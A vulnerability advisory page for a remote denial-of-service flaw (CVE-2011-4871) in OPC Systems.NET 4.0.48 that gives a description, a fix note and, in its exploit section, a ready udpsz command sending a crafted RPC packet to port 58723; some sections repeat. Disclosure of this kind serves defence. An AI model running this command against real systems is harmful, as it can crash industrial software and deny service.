OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
BID:50047
Info
OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
| Bugtraq ID: | 50047 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-4871 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 11 2011 12:00AM |
| Updated: | Jan 27 2012 04:30PM |
| Credit: | Luigi Auriemma |
| Vulnerable: |
OPC SYSTEMS OPC Systems.NET 4.0.48 |
| Not Vulnerable: |
OPC SYSTEMS OPC Systems.NET 5.0 |
Discussion
OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
OPC Systems.NET is prone to a denial-of-service vulnerability.
An attacker may exploit this issue to crash the affected application, denying service to legitimate users.
OPC Systems.NET 4.00.0048 is vulnerable; other versions may also be affected.
OPC Systems.NET is prone to a denial-of-service vulnerability.
An attacker may exploit this issue to crash the affected application, denying service to legitimate users.
OPC Systems.NET 4.00.0048 is vulnerable; other versions may also be affected.
Exploit / POC
OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
The following exploit is available:
udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80
The following exploit is available:
udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80
Solution / Fix
OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
Solution:
Updates are available. Please see the reference for more details.
Solution:
Updates are available. Please see the reference for more details.
References
OPC Systems.NET RPC Packet Remote Denial of Service Vulnerability
References:
References: